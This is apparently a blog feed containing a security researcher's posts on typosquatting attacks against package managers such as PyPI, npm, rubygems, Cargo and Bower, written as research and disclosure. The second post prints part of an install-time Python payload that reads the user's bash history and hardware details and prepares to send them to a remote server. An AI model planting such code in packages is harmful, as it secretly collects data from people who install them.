<span class="nb">print</span><span class="p">(</span><span class="s1">'Real cardinality=</span><span class="si">{}</span><span class="s1"> and estimated cardinality=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">real</span><span class="p">,</span> <span class="n">est</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Error is: </span><span class="si">{0:.2f}</span><span class="s1">%'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">error</span><span class="p">))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>What other package managers are vulnerable to typo squatting attacks?2016-06-30T17:58:00+02:002016-06-30T21:56:00+02:00Nikolai Tschachertag:incolumitas.com,2016-06-30:/2016/06/30/what-other-package-managers-are-vulnerable-to-typosquatting/<p>In my last blog post about <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/">typosquatting package managers</a> I discussed my findings about attacking the programming language package managers from <em>rubygems.org, PyPi</em> and <em>npmjs.com</em>.</p>
<p>This blog contribution generated quite some interest and people subsequently asked themselves whether <strong>other package managers
might also be vulnerable to this hybrid attack</strong> (typosquatting involves a technical and psychological attack vector). During the time I wrote my thesis, I encountered some other package managers. A very good overview of some of the most recent package managers gives the <a href="https://github.com/showcases/package-managers">github showcase page</a> about package managers which is summarized in the table below:</p>
<table>
<thead>
<tr>
<th>Package Manager Name</th>
<th># of Stars on Github</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://github.com/bower/bower">bower/bower</a></td>
<td>14257</td>
</tr>
<tr>
<td><a href="https://github.com/VundleVim/Vundle.vim">VundleVim/Vundle.vim</a></td>
<td>11969</td>
</tr>
<tr>
<td><a href="https://github.com/npm/npm">npm/npm</a></td>
<td>9664</td>
</tr>
<tr>
<td><a href="https://github.com/alcatraz/Alcatraz">alcatraz/Alcatraz</a></td>
<td>8936</td>
</tr>
<tr>
<td><a href="https://github.com/CocoaPods/CocoaPods">CocoaPods/CocoaPods</a></td>
<td>8115</td>
</tr>
<tr>
<td><a href="https://github.com/composer/composer">composer/composer</a></td>
<td>7909</td>
</tr>
<tr>
<td><a href="https://github.com/Carthage/Carthage">Carthage/Carthage</a></td>
<td>7160</td>
</tr>
<tr>
<td><a href="https://github.com/jordansissel/fpm">jordansissel/fpm</a></td>
<td>6722</td>
</tr>
<tr>
<td><a href="https://github.com/componentjs/component">componentjs/component</a></td>
<td>4503</td>
</tr>
<tr>
<td><a href="https://github.com/apple/swift-package-manager">apple/swift-package-manager</a></td>
<td>4318</td>
</tr>
<tr>
<td><a href="https://github.com/wbond/package_control">wbond/package_control</a></td>
<td>3018</td>
</tr>
<tr>
<td><a href="https://github.com/pypa/pip">pypa/pip</a></td>
<td>2911</td>
</tr>
<tr>
<td><a href="https://github.com/chocolatey/chocolatey">chocolatey/chocolatey</a></td>
<td>2741</td>
</tr>
<tr>
<td><a href="https://github.com/Masterminds/glide">Masterminds/glide</a></td>
<td>2163</td>
</tr>
<tr>
<td><a href="https://github.com/tmux-plugins/tpm">tmux-plugins/tpm</a></td>
<td>1961</td>
</tr>
<tr>
<td><a href="https://github.com/Homebrew/brew">Homebrew/brew</a></td>
<td>1757</td>
</tr>
<tr>
<td><a href="https://github.com/rust-lang/cargo">rust-lang/cargo</a></td>
<td>1705</td>
</tr>
<tr>
<td><a href="https://github.com/rubygems/rubygems">rubygems/rubygems</a></td>
<td>1547</td>
</tr>
<tr>
<td><a href="https://github.com/caolan/jam">caolan/jam</a></td>
<td>1540</td>
</tr>
<tr>
<td><a href="https://github.com/volojs/volo">volojs/volo</a></td>
<td>1326</td>
</tr>
<tr>
<td><a href="https://github.com/gpmgo/gopm">gpmgo/gopm</a></td>
<td>1027</td>
</tr>
<tr>
<td><a href="https://github.com/spmjs/spm">spmjs/spm</a></td>
<td>882</td>
</tr>
<tr>
<td><a href="https://github.com/atom/apm">atom/apm</a></td>
<td>690</td>
</tr>
<tr>
<td><a href="https://github.com/freshshell/fresh">freshshell/fresh</a></td>
<td>674</td>
</tr>
<tr>
<td><a href="https://github.com/ruslo/hunter">ruslo/hunter</a></td>
<td>436</td>
</tr>
<tr>
<td><a href="https://github.com/ocaml/opam">ocaml/opam</a></td>
<td>425</td>
</tr>
<tr>
<td><a href="https://github.com/NuGet/Home">NuGet/Home</a></td>
<td>367</td>
</tr>
</tbody>
</table>
<p>The obvious question now is: How many of those package managers …</p><p>In my last blog post about <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/">typosquatting package managers</a> I discussed my findings about attacking the programming language package managers from <em>rubygems.org, PyPi</em> and <em>npmjs.com</em>.</p>
<p>This blog contribution generated quite some interest and people subsequently asked themselves whether <strong>other package managers
might also be vulnerable to this hybrid attack</strong> (typosquatting involves a technical and psychological attack vector). During the time I wrote my thesis, I encountered some other package managers. A very good overview of some of the most recent package managers gives the <a href="https://github.com/showcases/package-managers">github showcase page</a> about package managers which is summarized in the table below:</p>
<table>
<thead>
<tr>
<th>Package Manager Name</th>
<th># of Stars on Github</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://github.com/bower/bower">bower/bower</a></td>
<td>14257</td>
</tr>
<tr>
<td><a href="https://github.com/VundleVim/Vundle.vim">VundleVim/Vundle.vim</a></td>
<td>11969</td>
</tr>
<tr>
<td><a href="https://github.com/npm/npm">npm/npm</a></td>
<td>9664</td>
</tr>
<tr>
<td><a href="https://github.com/alcatraz/Alcatraz">alcatraz/Alcatraz</a></td>
<td>8936</td>
</tr>
<tr>
<td><a href="https://github.com/CocoaPods/CocoaPods">CocoaPods/CocoaPods</a></td>
<td>8115</td>
</tr>
<tr>
<td><a href="https://github.com/composer/composer">composer/composer</a></td>
<td>7909</td>
</tr>
<tr>
<td><a href="https://github.com/Carthage/Carthage">Carthage/Carthage</a></td>
<td>7160</td>
</tr>
<tr>
<td><a href="https://github.com/jordansissel/fpm">jordansissel/fpm</a></td>
<td>6722</td>
</tr>
<tr>
<td><a href="https://github.com/componentjs/component">componentjs/component</a></td>
<td>4503</td>
</tr>
<tr>
<td><a href="https://github.com/apple/swift-package-manager">apple/swift-package-manager</a></td>
<td>4318</td>
</tr>
<tr>
<td><a href="https://github.com/wbond/package_control">wbond/package_control</a></td>
<td>3018</td>
</tr>
<tr>
<td><a href="https://github.com/pypa/pip">pypa/pip</a></td>
<td>2911</td>
</tr>
<tr>
<td><a href="https://github.com/chocolatey/chocolatey">chocolatey/chocolatey</a></td>
<td>2741</td>
</tr>
<tr>
<td><a href="https://github.com/Masterminds/glide">Masterminds/glide</a></td>
<td>2163</td>
</tr>
<tr>
<td><a href="https://github.com/tmux-plugins/tpm">tmux-plugins/tpm</a></td>
<td>1961</td>
</tr>
<tr>
<td><a href="https://github.com/Homebrew/brew">Homebrew/brew</a></td>
<td>1757</td>
</tr>
<tr>
<td><a href="https://github.com/rust-lang/cargo">rust-lang/cargo</a></td>
<td>1705</td>
</tr>
<tr>
<td><a href="https://github.com/rubygems/rubygems">rubygems/rubygems</a></td>
<td>1547</td>
</tr>
<tr>
<td><a href="https://github.com/caolan/jam">caolan/jam</a></td>
<td>1540</td>
</tr>
<tr>
<td><a href="https://github.com/volojs/volo">volojs/volo</a></td>
<td>1326</td>
</tr>
<tr>
<td><a href="https://github.com/gpmgo/gopm">gpmgo/gopm</a></td>
<td>1027</td>
</tr>
<tr>
<td><a href="https://github.com/spmjs/spm">spmjs/spm</a></td>
<td>882</td>
</tr>
<tr>
<td><a href="https://github.com/atom/apm">atom/apm</a></td>
<td>690</td>
</tr>
<tr>
<td><a href="https://github.com/freshshell/fresh">freshshell/fresh</a></td>
<td>674</td>
</tr>
<tr>
<td><a href="https://github.com/ruslo/hunter">ruslo/hunter</a></td>
<td>436</td>
</tr>
<tr>
<td><a href="https://github.com/ocaml/opam">ocaml/opam</a></td>
<td>425</td>
</tr>
<tr>
<td><a href="https://github.com/NuGet/Home">NuGet/Home</a></td>
<td>367</td>
</tr>
</tbody>
</table>
<p>The obvious question now is: How many of those package managers are vulnerable to typosquatting attacks. I stated three mandatory requirements that need to be fulfilled in order for those package repositories to be vulnerable for typosquatting attacks. Those were:</p>
<ol>
<li>The possibility of registering <strong>any package name and uploading code without any hard costs</strong> such as providing a real identity or registering a domain name.</li>
<li>The feasibility to <strong>achieve code execution upon package installation</strong> on the host system. This requirement is not absolutely needed since code may also be executed when the typo package is finally imported.</li>
<li>Accessibility and presence of <strong>good documentation</strong> for uploading and distributing packages
on the package repository. Plus: Flat learning curve to quickly develop a demo program in the target programming language.</li>
</ol>
<h2>Package managers that are not vulnerable</h2>
<p>A good approach seems to be studying package managers that were found to be not vulnerable to typosquatting attacks and identify
the critical differences that makes one package manager attackable and the other not. In my thesis, I initially wanted to also attack the repositories</p>
<ul>
<li><a href="https://bower.io/">Bower</a></li>
<li><a href="https://packagist.org/">Packagist</a></li>
<li><a href="http://www.cpan.org/">CPAN</a></li>
</ul>
<p>and found good reasons and obstacles to not include them in my attack.</p>
<h4>Bower</h4>
<p>There is a <a href="https://github.com/bower/bower/issues/249">long discussion on github</a> whether to allow pre- and post-install hooks similiar to the ones used in <em>npm</em>. <strong>Sheerun</strong> commented on <em>Apr 16, 2014</em> in a github issues discussion:</p>
<blockquote>
<p>This is utterly wrong idea... Allowing postinstall raises serious security issues. With them anyone is able to run arbitrary code on your computer and on your production machines... That's why it's impossible in tools like git to commit any hooks to repository. Bower is git of web.</p>
<p>This is especially dangerous in case of bower as it doesn't use any checksums, or packaging. A lot of people are depending on branches which can change in any moment (as well as tags btw.).</p>
<p>As @necolas pointed out postinstall is also useless to post-process files as user environment is unknown and unpredictable. Bower is going to have publish command so pre-publish hook will be ok.</p>
<p>If hooks are implemented, they should be immediately reverted and deprecated.</p>
</blockquote>
<p><strong>Sheerun</strong> also mentioned:</p>
<blockquote>
<p>If anyone want to compare with npm:</p>
<p>With npm post-install is more acceptable (still bad idea) because you can't avoid executing javascript files on server. Bower is different story as packages are executed only in web browser. Also npm has checksums, packaged packages, projects like https://nodesecurity.io/.</p>
<p>Moreover bower is used not only by node projects. This "feature" makes any project using bower directly vulnerable (like https://github.com/42dev/bower-rails or https://github.com/d-i/half-pipe or bower CDNs).</p>
</blockquote>
<p>This comment explains the exact reasons why a package manager shouldn't have pre/post install functionality. Additionally, there are a few points that make <em>Bower</em> very attractive to an attack:</p>
<ul>
<li>
<p>The Bower registry does not have authentication or user management at this point in time. It’s on a first come, first served basis.</p>
</li>
<li>
<p>Bower doesn’t support GitHub-style namespacing (org/repo)</p>
</li>
</ul>
<p>While I didn't find a way to achieve code execution on installation time in <em>Bower</em>, it is perfectly possible to spread typo squatted packages with other files than the intended front end files (like <em>.css, .js or .html</em> files). Just imagine to bypass security by typosquatting the popular <em>jQuery</em> library and adding some PHP files with exploit code that is triggered as soon as the manipulated <em>jQuery</em> library is loaded in a browser. This exploits the fact that libraries installed over <em>Bower</em> often find their way to servers and can thus be interpreted as a server side scripting language if the webserver is configured accordingly.</p>
<h4>CPAN</h4>
<p>The <em>CPAN</em> ecosystem was simply too complex and cumbersome to try to attack. The declining popularity of <em>CPAN</em> and Perl in the past years was another reason to exclude it from research. It might be the case that <em>CPAN</em> is vulnerable to typosquatting attacks. Can anyone familiar with the Perl ecosystem confirm this?</p>
<h4>Packagist (PHP)</h4>
<p><em>Packagist (PHP)</em> is not vulnerable to direct code execution upon package installation, because all installed packages are stored as dependency in sub folders, which are never directly touched. I tried to attack <em>Packagist</em> but couldn't find any way to achieve code execution on installation time. Maybe anyone familiar with the PHP ecosystem can double check this?</p>
<h2>Discussions about potentially vulnearble package managers</h2>
<p>After I published my last blog post, several discussions emerged in package management communities about the security of their repositories in regard to the typosquatting attack.</p>
<h4>Rust(Cargo)</h4>
<p>The relatively new programming language <em>Rust</em> has also a third party library repository which is named <em>Cargo</em>. The publication of my blog post provoked a discussion in a the <a href="https://www.reddit.com/r/rust/comments/4n5zrj/typosquatting_programming_language_package/">rust subreddit</a>.
<a href="https://www.reddit.com/r/rust/comments/4n5zrj/typosquatting_programming_language_package/d416n75">A user</a> mentions that Cargo lets you run arbitrary code on startup:</p>
<blockquote>
<p><strong>Cargo lets packages run arbitrary code on startup.</strong> This is pretty useful and important.
I wonder if we can use a sandbox model for this - don't let cargo scripts touch anything outside of the code directory.
Still dangerous but at least you don't have arbitrary read/write access.
I would imagine it is not idiomatic to install dependency packages for cargo scripts.</p>
</blockquote>
<p><a href="https://www.reddit.com/r/rust/comments/4n5zrj/typosquatting_programming_language_package/d416ic8">Another user</a> also confirms that <em>Cargo</em> might be affected by this vulnerability:</p>
<blockquote>
<p>This could affect crates.io (yay buildscripts!) AFAICT. However there are some important caveats with cargo.
For one thing, dependencies are added by editing a file, and CLI tools for including deps are third-party.
IME, I and others are more careful with typos in an editor than on the command line.
Further, my usual practice is to copy/paste the toml line from the crates.io page, and then remove the patch version.
But maybe that's not typical? Regardless, there's no tool for system-wide installation like pip or npm has, so it seems to me like there's
likely to be more intention behind adding a crate dependency.
Also, crates don't execute buildscripts when you add them to your Cargo.toml
(whether or not you use a tool like cargo edit), buildscripts run when you actually build your project,
so there's more chance you'll find the typo in between typing it and when malicious code could run.</p>
</blockquote>
<p>The same user also states that it doesn't seem feasible to remove the code execution on installation:</p>
<blockquote>
<p>The first doesn't seem practical because a) <strong>cargo supports arbitrary code execution in tests/benches anyways</strong> (duh) b) it'd be crappy to deprecate and c) it's really important for FFI crates and stable alternatives to compiler plugins.</p>
</blockquote>
<p>Another posted suggestion was to add an option to the package manager to allow running build scripts:</p>
<blockquote>
<p>I don't like auto-exec'ing buildscripts. But buildscripts are incredibly useful.
For cargo, we could simply stop automatically executing the buildscripts. At the same time, provide a switch called --dangerously-exec-buildscript or something else equally instructive.
Then, if I'm sure I know what I'm doing, I can do cargo install foo --dangerously-exec-buildscript</p>
</blockquote>
<p>I will examine <em>Cargo</em> in a next blog post closer and see whether it is vulnerable to typo squatting attacks by myself.</p>
<h4>Archlinux</h4>
<p>Archlinux is actually a Linux distribution, not a programming language. There was also a <a href="https://www.reddit.com/r/archlinux/comments/4n5e6a/typosquatting_programming_language_package/">discussion</a> in the archlinux subreddit about the security implications for letting users submit
own packages. A user essentially confirms that Archlinux and its PKGBUILD's are affected by typosquatting package managers by saying:</p>
<blockquote>
<p>Though package managers encourage you to read the pkgbuild and install. So if someone does read it, you can't just hide malicious install commands, you have to actually make your own github repo or something, and push malicious builds to there.</p>
</blockquote>
<h2>Package managers that will be examined closer in upcoming blog posts</h2>
<p>I will definitely examine the following package managers closer in the future. For <em>Nuget</em> I will need to install a Windows operating system and Visual Studio in order to test the upload
process manually. I hope that I don't need a Apple Operating system when trying to attack the swift language. Rust should work fine on Linux systems.</p>
<ul>
<li><a href="https://www.nuget.org/">Nuget C# .NET </a></li>
<li><a href="https://github.com/rust-lang/cargo">Cargo Rust</a></li>
<li><a href="https://github.com/apple/swift-package-manager">apple/swift-package-manager</a></li>
</ul>Typosquatting programming language package managers2016-06-08T10:08:00+02:002016-06-08T22:11:00+02:00Nikolai Tschachertag:incolumitas.com,2016-06-08:/2016/06/08/typosquatting-package-managers/<p>Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address: <strong>admin [|[at]|] incolumitas [[|dot|]] com</strong></p>
<p>In this blog post, it is demonstrated how</p>
<ul>
<li><strong>17000 computers</strong> were forced to execute arbitrary code by typosquatting programming language packages/libraries</li>
<li><strong>50%</strong> of these installations were conducted with administrative rights</li>
<li>Even highly security aware institutions (<strong>.gov and .mil hosts</strong>) fell victim to this attack</li>
<li>a typosquatting attack becomes <strong>wormable</strong> by mining the <strong>command history data</strong> of hosts</li>
<li>some good <em>defenses</em> against typosquatting package managers might look like</li>
</ul>
<p>The complete thesis <a href="https://incolumitas.com/data/thesis.pdf">can be downloaded as a PDF</a>.</p>
<p>In the second part of 2015 and the early months of 2016, I worked on my bachelors thesis. In this thesis, I tried to attack programming language package managers such as Pythons <em>PyPi</em>, NodeJS <em>Npmsjs.com</em> and Rubys <em>rubygems.org</em>. The attack does not exploit a new technical vulnerability, it rather tries to trick people into installing packages that they not intended to run on their systems.</p>
<h3>DNS Typosquatting</h3>
<p>In the domain name system, typosquatting is a well known problem. Typosquatting is the malicious registering of a domain that is lexically similar to another, often highly …</p><p>Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address: <strong>admin [|[at]|] incolumitas [[|dot|]] com</strong></p>
<p>In this blog post, it is demonstrated how</p>
<ul>
<li><strong>17000 computers</strong> were forced to execute arbitrary code by typosquatting programming language packages/libraries</li>
<li><strong>50%</strong> of these installations were conducted with administrative rights</li>
<li>Even highly security aware institutions (<strong>.gov and .mil hosts</strong>) fell victim to this attack</li>
<li>a typosquatting attack becomes <strong>wormable</strong> by mining the <strong>command history data</strong> of hosts</li>
<li>some good <em>defenses</em> against typosquatting package managers might look like</li>
</ul>
<p>The complete thesis <a href="https://incolumitas.com/data/thesis.pdf">can be downloaded as a PDF</a>.</p>
<p>In the second part of 2015 and the early months of 2016, I worked on my bachelors thesis. In this thesis, I tried to attack programming language package managers such as Pythons <em>PyPi</em>, NodeJS <em>Npmsjs.com</em> and Rubys <em>rubygems.org</em>. The attack does not exploit a new technical vulnerability, it rather tries to trick people into installing packages that they not intended to run on their systems.</p>
<h3>DNS Typosquatting</h3>
<p>In the domain name system, typosquatting is a well known problem. Typosquatting is the malicious registering of a domain that is lexically similar to another, often highly frequented, website. Typosquatters would for instance register a domain named <em>Gooogle.com</em> instead of the well known <em>Google.com</em>. Then they hope that people mistype the website name in the browser and accidentally arrive on the wrong site. The misguided traffic is then often monetized either with advertisements or malicious attacks such as drive by downloads or exploit kits.</p>
<h3>The Idea</h3>
<p>While writing the thesis, I wondered whether the concept behind DNS typosquatting can be transfered to other use cases. By using the programming language Python for several years, I learned that the third-party package manager <code>pip</code> (a command line application) is used to install software libraries from Python’s community repository named <code>PyPi</code>. So the natural question is: How many users do commit typos when issuing an installation command in the terminal by using <code>pip</code>?</p>
<div class="highlight"><pre><span></span><code>sudo pip install reqeusts
</code></pre></div>
<p>Because everybody can upload any package on <code>PyPi</code>, it is possible to create packages which are typo versions of popular packages that are prone to be mistyped. And if somebody unintentionally installs such a package, the next question comes intuitively: Is it possible to run arbitrary code and take over the computer during the installation process of a package?</p>
<h3>The Attack</h3>
<p>So basically we create a fake package that has a similar name as a famous package on <code>PyPi</code>, <code>Npmjs.com</code> or <code>rubygems.org</code>. For example we could upload a package named <em>reqeusts</em> instead of the famous <a href="https://pypi.python.org/pypi/requests/">requests</a> module. I created such typo package names in three different ways:</p>
<ol>
<li>
<p><strong>Creative typo names</strong> like <code>coffe-script</code> instead of <code>coffee-script</code>. Often only humans can create creative typo names, because its creation process requires an intuitive understanding of <em>what grammatical mistake is easy to make</em> with the origin name.</p>
</li>
<li>
<p><strong>Stdlib typos</strong> or core package names like <code>urllib2</code>. Stdlib typos are package names that do exist in the core of the language but haven't registered in the third party package manager yet.</p>
</li>
<li>
<p><strong>Algorithmically determined typo names</strong> like <code>req7est</code> instead of <code>request</code>. Algorithmically typo candidates are suggestions from algorithms like the Levenshtein distance.</p>
</li>
</ol>
<p>All in all, I created <strong>over 200 such packages</strong> and equipped them with a small program and uploaded them over the course of several months. The idea is to add some code to the packages that is executed whenever the package is downloaded with the installing user rights.</p>
<p>The following points need to be considered when attacking a package manager. The first two items of the list need to be fulfilled in order for the package repository to be vulnerable for typosquatting attacks.</p>
<ol>
<li>The possibility of registering <strong>any package name and uploading code</strong> without supervision.</li>
<li>The feasibility to <strong>achieve code execution upon package installation</strong> on the host system.</li>
<li>Accessibility and presence of good documentation for uploading and distributing packages
on the package repositories.</li>
<li>Difficulty in quickly learning the target programming language.</li>
</ol>
<p>The reader might now ask himself, whether it is really <em>that easy for a installing package to execute own code</em>?</p>
<h4>Code Execution for Installed Python Packages</h4>
<p>In Python, each package that is publicly registered, needs to have a <code>setup.py</code> file that contains package meta data such as names, description and fixtures belonging to the package. Whenever a user installs a package from the PyPi package
repository, this <code>setup.py</code> is executed by a local Python interpreter. This means, that it is possible
to hide code in the <code>setup.py</code> file that runs with the installing users rights.</p>
<h4>Code Execution for Installed NodeJS Packages</h4>
<p>NodeJS and its package manager, <code>npm</code>, provide various hooks on specific events to execute code.
There is also a <a href="https://docs.npmjs.com/misc/scripts">preinstall option</a> that can be set in the <code>package.json</code> file, that provides options
and metadata for a published NodeJS package. It is favorable to write this preinstall script also
in Javascript and execute it with the <code>node</code> binary, because node is guaranteed to be installed on
the target system, when <code>npm</code> is used to install third party packages.</p>
<h4>Code Execution for Installed Ruby Packages</h4>
<p>Achieving code execution with Ruby was slightly trickier. There is no official way (like in
Node.js) or easy method (like in Python’s <code>setup.py</code> file) to execute code upon installing packages
with the Ruby package manager named <code>gem</code>. However, code execution was achieved by
creating an <a href="http://blog.costan.us/2008/11/post-install-post-update-scripts-for.html">empty native Ruby extension</a> and placing the notification code in a Ruby extension configuration file named <code>extconf.rb</code>, which is interpreted during the pseudo build process.</p>
<h4>The Notification Program</h4>
<p>Now that we achieved code execution upon installation, it is time to show the program that was executed when the user installed such a typo package. The Python script below collects some non-personal host information and sends it to a University virtual private server that was setup beforehand. An equivalent program was developed for Ruby and NodeJS. I called this program <em>Notification Program</em>, because it notifies me whenever a user committed a typo and installed one of my typo packages. The data collected contains the <code>IP address, the operating system, the user rights</code> and a <code>timestamp</code> of the installation.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="sd">"""</span>
<span class="sd">Notification program used in the typo squatting</span>
<span class="sd">bachelor thesis for the python package index.</span>
<span class="sd">Created in autumn 2015.</span>
<span class="sd">Copyright by Nikolai Tschacher</span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">ctypes</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">platform</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="n">debug</span> <span class="o">=</span> <span class="kc">False</span>
<span class="c1"># we are using Python3</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">version_info</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">urllib.request</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">urlencode</span>
<span class="n">GET</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">urlopen</span>
<span class="k">def</span> <span class="nf">python3POST</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{},</span> <span class="n">headers</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Returns the response of the POST request as string or</span>
<span class="sd"> False if the resource could not be accessed.</span>
<span class="sd"> """</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlencode</span><span class="p">(</span><span class="n">data</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span>
<span class="n">request</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">Request</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">reponse</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span>
<span class="n">cs</span> <span class="o">=</span> <span class="n">reponse</span><span class="o">.</span><span class="n">headers</span><span class="o">.</span><span class="n">get_content_charset</span><span class="p">()</span>
<span class="k">if</span> <span class="n">cs</span><span class="p">:</span>
<span class="k">return</span> <span class="n">reponse</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="n">cs</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="n">reponse</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">urllib</span><span class="o">.</span><span class="n">error</span><span class="o">.</span><span class="n">HTTPError</span> <span class="k">as</span> <span class="n">he</span><span class="p">:</span>
<span class="c1"># try again if some 400 or 500 error was received</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="c1"># everything else fails</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">POST</span> <span class="o">=</span> <span class="n">python3POST</span>
<span class="c1"># we are using Python2</span>
<span class="k">else</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">urllib2</span>
<span class="kn">from</span> <span class="nn">urllib</span> <span class="kn">import</span> <span class="n">urlencode</span>
<span class="n">GET</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">urlopen</span>
<span class="k">def</span> <span class="nf">python2POST</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{},</span> <span class="n">headers</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> See python3POST</span>
<span class="sd"> """</span>
<span class="n">req</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">Request</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">urlencode</span><span class="p">(</span><span class="n">data</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">req</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span>
<span class="k">return</span> <span class="n">response</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">except</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">HTTPError</span> <span class="k">as</span> <span class="n">he</span><span class="p">:</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">POST</span> <span class="o">=</span> <span class="n">python2POST</span>
<span class="k">try</span><span class="p">:</span>
<span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="n">DEVNULL</span> <span class="c1"># py3k</span>
<span class="k">except</span> <span class="ne">ImportError</span><span class="p">:</span>
<span class="n">DEVNULL</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">devnull</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">get_command_history</span><span class="p">():</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="c1"># handle windows</span>
<span class="c1"># http://serverfault.com/questions/95404/</span>
<span class="c1">#is-there-a-global-persistent-cmd-history</span>
<span class="c1"># apparently, there is no history in windows :(</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span><span class="p">:</span>
<span class="c1"># handle linux and mac</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'cat </span><span class="si">{}</span><span class="s1">/.bash_history | grep -E "pip[23]? install"'</span>
<span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">expanduser</span><span class="p">(</span><span class="s1">'~'</span><span class="p">)))</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">get_hardware_info</span><span class="p">():</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="c1"># handle windows</span>
<span class="k">return</span> <span class="n">platform</span><span class="o">.</span><span class="n">processor</span><span class="p">()</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span><span class="p">:</span>
<span class="c1"># handle linux and mac</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">):</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="s1">'lshw -short'</span><span class="p">,</span>
<span class="n">stderr</span><span class="o">=</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">hw_info</span><span class="p">:</span>
